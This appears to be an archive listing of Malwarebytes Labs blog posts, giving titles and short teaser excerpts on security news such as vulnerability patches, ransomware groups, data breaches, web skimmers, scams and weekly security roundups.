Kaseya Unitrends has unpatched vulnerabilities that could help attackers expand a breach

It must not be easy to work at Kaseya right now. While they are working as hard as they can to help customers, and customers of their customers, recover from the REvil ransomware attack at the beginning of July, a new vulnerability in their software has been disclosed. As a sidenote, Kaseya...

A week in security (October 26 – November 1)

We had a very busy week at Malwarebytes Labs. We offered advice on Googles patch for an actively exploited zero-day bug that affects Chrome users, our podcast talked about finding consumer value in Cybersecurity Awareness Month with Jamie Court, we provided guidance about keeping ransomware cash...

A week in security (July 22 – 28)

Last week on Malwarebytes Labs, we offered an extensive analysis into the Malaysian Airlines Flight 17 investigation, updated users on the newest feature set to AdwCleaner 7.4.0 it now detects pre-installed software, and provided a deep dive into Phobos ransomware. We also broke down the latest...

Can search extensions keep your searches private?

One of the most common things most of us do on the Internet is search, whether we are looking up the price of the latest gadget or we need to find the address of that great restaurant recommended by a friend. The dizzying number of Google search queries per second more than 40,000, on average tel...

Badgelife: A Defcon 26 retrospective

One more year gone, one more Defcon completed. Defcon is the longest-running security conference in existence and one that I have been attending since Defcon 18. It is an opportunity to see and interact in real life with industry peers that would forever remain a digital persona otherwise. It is...

Major data breaches at Adidas, Ticketmaster pummel web users

There's been a number of data breaches and accidental data exposures coming to light in the last few days, and no matter where in the world you happen to be located, you'll want to do some due diligence and see if you've been affected. These aren't small fishes being preyed upon by black hats;...

A week in security (May 21 – May 27)

Last week we told you about a Mac cryptominer using XMRig, an overview of Dreamcast related scams, part 1 of decoding Emotet, and what to do about bad coding habits that die hard. We also published the results of our second CrackMe contest. Other news How a pioneer of machine learning became one ...

Far Cry 5 download offers: embrace the power of “no”

The recently released Far Cry 5 is a video game where you reclaim Montana from a cult obsessed with the "power of yes" by hitting members over the head with a shovel. It's also one of the biggest sellers for publisher Ubisoft to date, and it stands to reason that many people would like to grab a...

A week in security (April 09 – April 15)

Last week, we took a look at a malware-campaign called FakeUpdates, methods to use secure instant messaging, the inner workings of a decryption tool, and some Facebook spam campaigns. We also published our first quarterly Malwarebytes Labs CTNT report of 2018. Other news A security researcher...

Malicious cryptomining and the blacklist conundrum

When Coinhive first came out in September of 2017, it was fairly easy to identify websites using browser miners by looking for a few lines referencing the Coinhive API within the HTML source code. Because this was a new phenomenon, even bad actors didn't have to hide their intentions, and...

The digital entropy of death: link rot

Hot on the heels of a grim blog about digital death comes…another blog about digital death. Except in this case, the recently deceased would be the links that tie the web together, otherwise known as link rot. Link rot is a weird thing. Say I blog for Puppy Chow and I write an article about the...

Know your threats: the nine scariest malware monsters

It's been a particularly ghoulish year in cybersecurity, from Russian hacks to ransomware outbreaks. The bad boogey man in the black hoodie has been pulling one over the collective public. It's dark and creepy, but users refuse to stop peeking behind the door. It's enough to make even the most...

BlueBorne – Bluetooth’s airborne influenza

Armis Labs has discovered a new attack vector that targets any device that has Bluetooth capability. This includes mobile, desktop, and IoT — roughly accounting for 8.2 billion devices. All operating systems are susceptible — Android, iOS, Windows, and Linux. Dubbed BlueBorne, it exposes several...

How Outlook notification sounds can lead to zero-click exploits

An Akamai researcher has found two vulnerabilities in Windows that can be combined to achieve a full, zero-click remote code execution RCE in Outlook. Both vulnerabilities were responsibly disclosed to Microsoft and addressed in the August 2023 and October 2023 patch Tuesdays, so the researcher...

Rubrik is latest victim of the Clop ransomware zero-day campaign

Rubrik, a cybersecurity company specializing in cloud data management, has revealed that some of its systems were infiltrated by the Clop ransomware group. Rubrik is one of many companies attacked by Clop via an infamous zero-day vulnerability in the GoAnywhere file transfer software. The attack...

Update now! Mozilla patches two actively exploited vulnerabilities

Mozilla has announced it has fixed security vulnerabilities in Firefox 97.0.2, Firefox ESR 91.6.1, Firefox for Android 97.3.0, and Focus 97.3.0. Users should install the out-of-band security update as soon as possible, since it is designed to apply a fix for two vulnerabilities that are known to ...

Update now! Chrome patches actively exploited zero-day vulnerability

Google has released an update for its Chrome browser that includes eleven security fixes, one of which has been reportedly exploited in the wild. The vulnerability that is reported as being exploited in the wild has been assigned CVE-2022-0609. CVE-2022-0609 The vulnerability is described as a...

A week in security (May 6 – 12)

Last week on Labs, we discussed what to do when you discover a data breach, how 5G could impact cybersecurity strategy, the top six takeaways for user privacy, vulnerabilities in financial mobile apps that put consumers and businesses at risk, and in our series about vital infrastructure, we...

Labs Cybercrime Tactics and Techniques report finds businesses hit with 235 percent more threats in Q1

The Malwarebytes Labs Cybercrime Tactics and Techniques Q1 2019 report found businesses at the butt end of a bad joke. In just one year, threats aimed at corporate targets have increased by 235 percent, with Trojans, such as Emotet, and ransomware in particular revving up in the first quarter...

Green card scams: preying on the desperate

Thanks to @nullcookies for providing leads. Most online scams depend on two things for success: a broken or otherwise onerous process to deal with a legitimate entity, and a desperate target population. With immigration, there are many, many burdensome processes to navigate, and most applicants...

Encryption 101: a malware analyst’s primer

While most in the security industry know what encryption is, many lack a basic understanding of how it is used in malware—especially ransomware. Because of this, we thought it would be beneficial to do an introductory primer on encryption mechanisms and how they are exploited for malicious...

Hansa Market on Dark Web seized by Dutch police

In a simultaneous press conference issued by the Dutch police and US Attorney General Jeff Sessions we learned that the Dark Web market places Alphabay and Hansa market have been seized and shut down by international cooperating authorities. As it turned out Hansa Market was already under control...

A .NET malware abusing legitimate ffmpeg

There is a growing trend among malware authors to incorporate legitimate applications in their malicious package. This time, we analyzed a malware downloading a legitimate ffmpeg. Using this application, this simple spyware written in .NET got a powerful feature. Most of the malware is sufficient...

Update vRealize now! VMware patches critical RCE vulnerabilities

VMware has issued a security advisory for vRealize Log Insight that covers four vulnerabilities reported privately by the Zero Day Initiative ZDI. Two of these vulnerabilities are rated as critical. The issues have been fixed on vRealize Log Insight 8.10.2, so users should upgrade to the latest...

Update now! Apple patches zero-day vulnerability affecting Macs, Apple Watch, and Apple TV

Apple has released security updates for a zero-day vulnerability that affects multiple products, including Mac, Apple Watch, and Apple TV. The flaw is an out-of-bounds write issue—tracked as CVE-2022-22675—in AppleAVD, a decoder that handles specific media files. An out-of-bounds write or read fl...

The Conti ransomware leaks

On February 27, an individual with insights into the Conti ransomware group started leaking a treasure trove of data beginning with internal chat messages. Conti is responsible for a number of high profile attacks, including one against the Irish Healthcare system which has cost more than $48...

BrakTooth Bluetooth vulnerabilities, crash all the devices!

Security researchers have revealed details about a set of 16 vulnerabilities that impact the Bluetooth software stack that ships with System-on-Chip SoC boards from several popular vendors. The same group of researchers disclosed the SweynTooth vulnerabilities in February 2020. They decided to du...

Website misconfigurations and other errors to avoid

Website owners, listen up: There are lots of things you shouldn’t do with your site, and many more you should avoid with the domains you’re responsible for. Insider malice, bad luck, and the stars aligning in impossible ways can all give your online portfolio a bad hair day. However, if you want ...

Discord users tempted by bots offering “free Nitro games”

The last few weeks have seen multiple instances of problematic bots appearing in Discord channels. They bring tidings of gifts, but the reality is quite a bit different. Given so many more young kids and teens are at home during the current global lockdown, they may well see this scam bouncing...

APTs and COVID-19: How advanced persistent threats use the coronavirus as a lure

The coronavirus COVID-19 has become a global pandemic, and this is a golden time for attackers to take advantage of our collective fear to increase the likelihood of successful attack. True to form, they've been doing just that: performing spam and spear phishing campaigns using coronavirus as a...

CEOs offer their own view of a US data privacy law

Last week, the chief executives of more than 50 mid- and large-sized companies urged Congress to pass a national data privacy law to regulate how companies collect, use, and share Americans’ data. Buried deep within the chief executives’ recommendations for such a law, presented as a policy...

A week in security (February 11 – 17)

Last week on Malwarebytes Labs we discussed the return of the Sextortion Bitcoin scams, we gave you an early overview of the exploit kits in the winter of 2019, we talked about the destruction of VFEmail service, for consumers we discussed whether you should remove yourself from social media, for...

Web skimmers compete in Umbro Brasil hack

Umbro, the popular sportswear brand has had their Umbro Brasil website hacked and injected with not one but two web skimmers part of the Magecart group. Magecart has become a household name in recent months due to high profile attacks on various merchant websites. Criminals can seamlessly steal...

Did my comment on your blog get lost?

If you ever feel bad about your job because of mindless tasks you must perform day after day, or if you're bothered by the fact that your chosen work pays crap, produces nothing useful, and helps no one: have a look at blog comment spammers and breathe a sigh of relief. They make almost any job...

Internet Safety Month: How to protect your child’s privacy online

June marks the beginning of summer. It is also National Internet Safety Month. This is the perfect time to remind vacationers that while it is essential to check that everything you need is packed and ready for a trip, it is equally vital for the family to take steps in securing their devices and...

Solution Corner: Malwarebytes for Mac

Mac users have been told for years: Macs don't get viruses. Even Apple said so, in their famous Get a Mac ads that aired a decade ago. Wow, that's so cool! It's good to know we're all safe. Now, on a different topic, can you tell me why Safari is going to a Russian search engine instead of Google...

Bye, bye Petya! Decryptor for old versions released.

Following the outbreak of the Petya-based malware in Ukraine, the author of the original version, Janus, decided to release his master key, probably closing the project. You can read the full story here. Based on the released key, we prepared a decryptor that is capable of unlocking all the...

Exim finally fixes 3 out of 6 vulnerabilities

Exim is a message transfer agent MTA originally developed at the University of Cambridge for use on Unix systems connected to the internet, and is freely available under the terms of the GNU General Public Licence. Even though the name may be new to you, a Shodan search revealed 3.5 million serve...

Would real identities make social media safer?

“Use real identities to reduce abuse online” is a talking point youve almost certainly seen down the years. It also seems to come around like clockwork every other month, and is currently a hot topic in the UK after prominent journalists / media personalities raised the issue. It’s an interesting...

Misleading cybersecurity lessons from pop culture: how Hollywood teaches to hack

In pop culture, cybercrimes are often portrayed as mysterious and unrealistic. Hackers are enigmatic and have extraordinary tech abilities. They can discover top secrets in a short time and type at breakneck speed to hack into a database. In real life, though, hacking is not that straightforward...

Fintech security: the challenges and fails of a new era

"I have no idea how this app from my bank works, and I don't trust what I don't understand." Josh is not an old curmudgeon or luddite. He's 42 with a decent understanding of technology. Nevertheless, the changes in fintech have come too fast for him. It's not that he doesn't trust his bank. He...

Threat spotlight: Phobos ransomware lives up to its name

Ransomware has struck dead on organizations since it became a mainstream tool in cybercriminals' belts years ago. From massive WannaCry outbreaks in 2017 to industry-focused attacks by Ryuk in 2019, ransomware's got its hooks in global businesses and shows no signs of stopping. That includes a...

Billion-dollar search engine industry attracts vultures, shady advertisers, and cybercriminals

Search engines make money by showing users sponsored advertisements—a lot of money. This attracts attention, competition, and plenty who want a piece of the action without doing the actual work or considering the impact to those on the other end of the search bar. Because in the search business,...

New version of IcedID Trojan uses steganographic payloads

This blog post was authored by @hasherezade, with contributions from @siriurz and Jérôme Segura. Security firm Proofpoint recently published a report about a series of malspam campaigns they attribute to a threat actor called TA2101. Originally targeting German and Italian users with Cobalt Strik...

White hat, black hat, and the emergence of the gray hat: the true costs of cybercrime

This post was written by Michael Osterman of Osterman Research. Osterman Research recently completed a major survey on behalf of Malwarebytes to determine the actual cost of cybercrime to businesses. Many studies have focused on the cost of lost reputation, lost future business, and other...

A week in security (July 2 – July 8)

Last week, we tracked back a large mining operation from their Coinhive shortlink, we took a look at online project management tools, we described a new macro-less technique to distribute malware, and talked about a Mac malware that targets crypto-mining users. Other news: Huawei enterprise comms...

Mac malware OSX.Proton strikes again

The hackers responsible for the Mac malware OSX.Proton have struck again, this time infecting a copy of the Elmedia Player app that was being distributed from the official Eltima website. At this time, it is still unknown how long their website was providing the hijacked app. Proton was silently...

Google patches critical vulnerability for Androids with Qualcomm chips

In April’s update for the Android operating system OS, Google has patched 28 vulnerabilities, one of which is rated critical for Android devices equipped with Qualcomm chips. You can find your device’s Android version number, security update level, and Google Play system level in your Settings ap...

Pegasus spyware and how it exploited a WebP vulnerability

Recent events have demonstrated very clearly just how persistent and wide-spread the Pegasus spyware is. For those that have missed the subtle clues, we have tried to construct a clear picture. We attempted to follow the timeline of events, but have made some adjustments to keep the flow of the...

InfraGard infiltrated by cybercriminal

InfraGard, a partnership between the FBI and members of the private sector that was established to protect critical infrastructure in the US, has been infiltrated by a cybercriminal. As a result, its database of contact information is now for sale on an English-language cybercrime forum. InfraGar...